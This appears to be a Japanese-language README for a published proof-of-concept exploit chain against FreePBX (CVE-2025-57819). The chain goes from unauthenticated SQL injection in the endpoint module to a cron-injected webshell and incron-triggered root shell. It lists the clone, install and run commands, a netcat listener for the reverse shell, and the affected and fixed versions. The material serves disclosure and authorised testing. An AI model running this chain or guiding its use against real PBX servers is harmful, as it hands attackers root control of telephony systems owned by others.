
FreePBX 15、16、17向けCVE-2025-57819のフルチェーンPoC: 未認証SQLiからRCE、ルート権限の奪取まで。
CVE-2025-57819 のフルチェーン PoC です。FreePBX の endpoint モジュールにおける認証不要のエラーベース SQL インジェクションが、cron ジョブインジェクションと incron 権限昇格を経由して root シェルへと連鎖します。
許可されたテストおよび研究目的のみに使用してください。所有していないシステムに対して使用しないでください。
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.php に対するエラーベースインジェクションで DB 情報を取得しますasterisk として RCE を確認しますfwconsole フックを発火させる incron トリガーファイルを作成しますgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
先にリスナーを起動してください:
nc -lvnp 9999
次に実行します:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup は、悪用後にウェブシェルと cron ジョブを削除します。
endpoint モジュールがインストールされた FreePBX。/admin/ajax.php 内の brand パラメータがサニタイズされずに SQL クエリへ渡されます。
| FreePBX | 修正済みバージョン |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev